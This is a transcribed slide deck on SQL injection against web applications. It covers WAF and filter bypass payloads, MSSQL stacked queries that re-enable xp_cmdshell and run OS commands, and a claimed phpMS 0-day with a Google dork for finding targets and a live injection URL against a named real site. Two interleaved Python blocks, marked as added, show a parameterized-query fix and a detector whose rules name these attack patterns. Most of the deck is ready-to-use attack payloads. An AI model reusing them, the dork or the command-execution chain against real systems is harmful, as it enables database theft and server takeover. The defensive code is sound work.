Sql Injections With Real Life Scenarios

Aug 21, 2015

Page 1

SQL INJECTIONS WITH REAL LIFE SCENARIOS

By Francis Alexander

Page 2

WHO AM I?

• Got listed on the eBay and Microsoft security researcher lists

• Worked as a freelance security researcher for tech2.in.com and in.com

• Found SQLi vulnerabilities in the Kerala entrance portal website

• http://tech2.in.com/news/general/updated-serious-vulnerability-affects-kerala-common-entrance-exams-portal/369982

• Basically the InfoSec researcher guy

Page 3

AGENDA

Strictly WAF-based and real-life scenarios

MSSQL stacked queries (thought it a good add-on)

A PHP-MS 0-day

Page 4

SQLI: AN INTRO

First among the OWASP Top 10 vulnerabilities

Used for gaining access to the SQL database and hence the b0x

Mainly of 5 types:

• Union based

• Error based

• XPath based

• Blind and time based

• Double query based

Page 5

PENTESTING SQLI IN THE REAL WORLD

So what's the catch here!!!

Pentesting real-life scenarios is more difficult than ever

SQLi has been patched, and firewalls, IDS and IPS are installed everywhere

Exploiting SQLi has become difficult, and the tools have disappointed too!

Page 6

WHAT HAS KEPT US DULL

Of course, the failure of sqlmap!!!

The failure of Havij, which by the way is always a failure :p

IDS, IPS and the rest of the firewall family

Apache security modules (mod_sec), htmlentities, mysql_escape, magic_quotes and all my dear appsec modules

Page 7

ADVANCED WAF BYPASSING TECHNIQUES

What are they!!?

Well, we need to overcome the situation that has arisen rather than sit and lament over it

Here we will be focusing on the real-life scenarios where the tools fail and much of our human hard work comes in

Page 8

BYPASSING FILTERS

preg_match is a pattern-matching (comparison) function used in PHP

Mainly deployed by small-scale WAFs

The more poorly coded they are, the easier it is; an example follows

Page 9

SQLI USING STORED PARAMETERS

Used when “select” followed by any letter is blocked: 'select' + '(A-Za-z)'

So any letter after select gets filtered out

Solution: MySQL has a feature called stored (user-defined) variables. “@” is a prefix that denotes stored procedure and function parameter names, and variable names.

Page 10

So how do we do it?

union select 1,2,3-- = 403 Forbidden

So it changes to: and (@:=version()) union select 1,@,3-- = bypassed

Page 11

WHERE HAS THE ID=? DISAPPEARED

So what's the catch here? Most of us love the dork inurl:php?id= site:blah.com

So what has happened: most admins have moved the id= parameter into the URL path, making the tools go reckless and n00bs go mad

An example: the usual way was site.com/index.php?id= ; now they have gone and changed it to site.com/index-goods-12.html

An example site that has no obvious point of injection at first sight

Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-suis-prete,884.html

Page 13

A FEW POINTS TO PONDER

The usual commenting style should be followed here, i.e. “--”; otherwise other forms like %23 (#) and /* could cause the browser to misinterpret the statement as a comment, commenting out the rest and not letting it read the .html part

In most cases where these types of injections are encountered there are white spaces, which often cause havoc and are a nightmare for scanners

Page 14

MESSING UP WITH WHITE SPACES

Well, dealing with white spaces depends on the scenario

You could use the traditional commenting style, like id=3/**/union/**/select 1,2,3

The problem is that /**/ might be filtered in some cases, so we use parentheses, which is the same as executing the query: id=(2)union(select(1),2,3)

NB: during HTML-based injections it is better to use the parentheses
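The rewritten URL from page 11 still hands its value to the query, and a page-8 style blocklist that only looks for “select” followed by a letter lets the parenthesised payload above straight through. The following is an added example (not from the talk; the goods table, route pattern and function names are constructed) that puts the rewrite, the blocklist and the concatenated query beside the fix a defender actually wants: an integer type check and a bound parameter.

```python
import re
import sqlite3

# Constructed route: a rewrite rule mapping /index-goods-12.html to id=12.
ROUTE = re.compile(r"^/index-goods-(?P<id>[^/]+)\.html$")


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's goods table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE goods (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO goods VALUES (?, ?)", [(12, "widget"), (884, "gadget")])
    return conn


def extract_id(path: str) -> str:
    """Pull the id out of the pretty URL, as the rewrite rule does.
    Whatever sits between 'index-goods-' and '.html' is passed on untouched:
    the rewrite hides the parameter from dorks and tools, not from the SQL parser."""
    m = ROUTE.match(path)
    if m is None:
        raise LookupError("no matching route")
    return m.group("id")


def blocklist_passes(value: str) -> bool:
    """The page-8 style preg_match filter: reject 'select' followed by a letter."""
    return re.search(r"select[a-z]", value, re.I) is None


def build_unsafe_sql(value: str) -> str:
    """String concatenation: the extracted value is spliced straight into the query."""
    return "SELECT name FROM goods WHERE id=" + value


def lookup_safe(conn: sqlite3.Connection, value: str):
    """Hardened form: enforce the integer type first, then bind the parameter.
    Anything that is not a plain positive integer never reaches the database."""
    if not re.fullmatch(r"\d{1,9}", value):
        raise ValueError("id must be a small positive integer")
    row = conn.execute("SELECT name FROM goods WHERE id=?", (int(value),)).fetchone()
    return row[0] if row else None
```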

Page 15

SQLI IN HTML TAGS

Based on error 1222

Came across CTFs where the answer had to be obtained with normal union-based injection.

Most tools fail here, since the vulnerable column is being parsed in between the HTML tags.

Usually union statements are being provided here, but the columns do not get displayed.

So what do we do? Please don't say we look over the source, because you're not going to find anything at the first shot

Page 17

We do this by changing the traditional union select 1,2,3 to union select 1111,2222,3333

This helps us to search for it in the source, but it is still not visible on screen.

Page 18

If you would like to display it on screen, you could use the concat or group_concat functions, using HTML inside them

Use the hex of the HTML if quotes are blocked due to magic quotes

Here we could see the version on closing the “</title>” tag, since the vulnerable column was being displayed within the title block

Page 19

BYPASSING SOME COMMON ERRORS

Bypassing errors 400/403/404/406: convert(group_concat(schema_name) using ascii) from information_schema.schemata--

C-style commenting: /*!Union*/+/*!Select*/ // apart from the original source commenting, the ! executes the command

Character encoding: bypasses filters like 400: %55nion/**/%53elect

Sub queries: Union (select 1,2,3) // where most WAFs fail

Page 20

id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a // # is a comment, but the %0A bypasses it with a new line, so the statements get executed

Bypassing error 1064: usually related to the blocking of white spaces: id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0)) // the queries are supplied in parentheses so as to avoid the use of white spaces; “/**/” commenting is also possible

Bypassing error 500: and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+ // WAFs written in C are prone to overflow or act differently when loaded with a bunch of data. Giving a large amount of data allows our code to execute

Page 21

INTRO TO MSSQL STACKED QUERIES

Stacked queries are mainly available on MSSQL and PostgreSQL servers

The underlying process is simple: if the cmdshell option is enabled then you are in

Stacked query support is checked on the server using 'WAITFOR DELAY hour:min:sec'

For ex: EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-- - would check whether cmdshell is enabled or not, depending on the time lag.

Page 22

RE-ENABLING XP_CMDSHELL IN CASE IT'S DEAD?

http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show advanced options', 1-- -

http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -

http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1-- -

http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
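Every evasion on pages 10, 19 and 20 hides the same `union ... select` from a filter that matches the raw string, and the stacked MSSQL requests on page 22 hide `EXEC sp_configure` behind a `;`. A detector therefore has to normalize before it matches. The following is an added example (mine, not from the talk) that decodes the value, strips comments the way the MySQL parser would, collapses parentheses and whitespace, and only then applies its rules; the sample requests are constructed from the slides' own payloads, and the rule names are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed request values. The attack strings are the evasion payloads quoted on
# pages 10, 19, 20 and 22; the last two are the rewritten URL forms from page 11.
SAMPLES = {
    "stored_var":  "id=1 and (@:=version()) union select 1,@,3--",
    "inline_exec": "id=1 /*!Union*/+/*!Select*/+1,2,3",
    "url_encoded": "id=1 %55nion/**/%53elect 1,2,3",
    "newline":     "id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a",
    "parens":      "id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))",
    "mixed_case":  "id=1 and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+",
    "stacked":     "vulnID=123; EXEC sp_configure 'xp_cmdshell', 1-- -",
    "benign_id":   "id=12",
    "benign_path": "index-goods-12.html",
}


def normalize(raw: str) -> str:
    """Reduce a request value to roughly the token stream the SQL parser will see."""
    s = raw
    for _ in range(3):                      # undo URL encoding, including double encoding
        s = unquote_plus(s)
    # MySQL executes the body of /*!...*/ (and /*!50000...*/), so keep it as plain text
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)   # ordinary comments are just whitespace
    s = re.sub(r"#[^\n]*", " ", s)                 # '#' comments end at a newline (%0A)
    s = re.sub(r"[()]", " ", s)                    # parentheses separate tokens like spaces
    return re.sub(r"\s+", " ", s).strip().lower()


# Rule names are assumptions made for this example, not taken from any product.
RULES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "user_variable_assign": re.compile(r"@\w*\s*:="),
    "stacked_exec": re.compile(r";\s*exec(?:ute)?\b"),
    "cmdshell_config": re.compile(r"\bxp_cmdshell\b|\bsp_configure\b"),
}


def classify(raw: str) -> list:
    """Names of the rules that match once the value has been normalized."""
    text = normalize(raw)
    return [name for name, rx in RULES.items() if rx.search(text)]


if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:12} -> {classify(value) or 'clean'}")
```

Matching on the normalized form is what makes the letter-after-select and whitespace tricks irrelevant; the raw-string filters the slides defeat never see `union select` at all.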

Page 23

THE SITE CHECKED FOR PRIMARY ERRORS USING THE TRADITIONAL UNION SELECT STATEMENTS

Page 24

Just to prove that this still exists: a real-life demo

Page 25

QUERY PARTY

http://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));--

// Creates the table funkyfresh

http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -

// We declare a variable @funky and store the hex equivalent of the command in it. NOTE: 0x77686f616d69 => 'whoami'

Page 26

/!*AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)))

// Credits to Bernardo's original write-up from BlackHat

// The reason I took it: although a bit complicated, it works seamlessly for no apparent reason. Read the temp table to get the results, and you need to make sure you deal with the same data type when you do...

Page 28

PHP-MS EXPLOIT 0-DAY

0-day by me

phpMS: a free CMS (content management system), designed for rapid development and support of web projects of any complexity.

Features of CMS phpMS: easy to install; multi-level menus; arbitrary arrangement of blocks; simple module development; access rights

Page 29

# GOOGLE DORK: INTEXT:COPYRIGHT©2005 PHPMS

Demo: http://www.rusug.ru/index.php?tree=8&mode=view&id=-7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6--

# By default 6 columns in most cases seen, so this could be used as the default on sites discovered

# Finding the admin page of this makes it very easy to exploit

# Default admin page is admin.php :-) Eg: http://www.site.com/admin.php :)

Page 30

ANY QUESTIONS?

References

A couple of BlackHat talks and papers

kaotickreations.blogspot.in (my blog)

http://websec.wordpress.com/tag/sql-filter-evasion/